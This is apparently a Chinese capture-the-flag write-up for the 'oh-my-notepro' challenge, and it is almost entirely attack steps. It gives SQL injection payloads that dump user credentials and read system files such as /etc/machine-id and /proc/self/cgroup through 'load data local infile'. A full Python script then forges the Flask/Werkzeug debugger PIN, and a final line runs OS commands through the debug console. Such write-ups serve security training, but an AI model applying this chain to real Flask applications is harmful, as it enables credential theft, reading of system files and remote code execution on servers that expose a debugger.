oh-my-notepro

知识点：求pin码

登录页面后测试可以发现在note_id处可以sql注入。

%27union%20select%201,2,3,version(),(select%20group_concat(username,0x3a,password)%20from%20users);%23

可以得到用户名和密码，但用处不大。

可以用pin码登录控制台来

3.8的pin码计算脚本如下，需要以下信息：

1. username，用户名，可以读取/etc/passwd得到
2. modname，默认值为flask.app
3. appname，默认值为Flask
4. moddir，flask库下app.py的绝对路径（报错得到）
5. uuidnode，当前网络的mac地址的十进制数，通过文件/sys/class/net/eth0/address得到16进制结果，转化为10进制进行计算
6. machine_id，docker机器id，读取/etc/machine-id ，/proc/sys/kernel/random/boot_id ，/proc/self/cgroup，前两个任选一个与最后一个拼接

可以再报错处看

';create table bbb(name varchar(1000));load data local infile "/sys/class/net/eth0/address" into table ctf.bbb;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.bbb);%23

再转成16进制

#02:42:ac:12:00:03
print(int('0242ac120003',16))
#2485377957891

';create table machine(name varchar(1000));load data local infile "/etc/machine-id" into table ctf.machine;%23

'union select 1,2,3,4,(select GROUP_CONCAt(name) from ctf.machine)%23

';create table cc(name varchar(1000));load data local infile "/proc/self/cgroup" into table ctf.cc;%23

'union select 1,2,3,4,(select group_concat(name) from ctf.cc);%23

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctf'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485377957891',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个)：1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    '1cc402dd0e11d5ae18db04a6de87223d9cfbff4dca5ae8bd5f82dad5b7b30f43bc41fcde7cf41bdfa213e96595e05ff7'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

获得pin码后，到控制台执行命令

__import__("os").popen("cmd").read()

1

2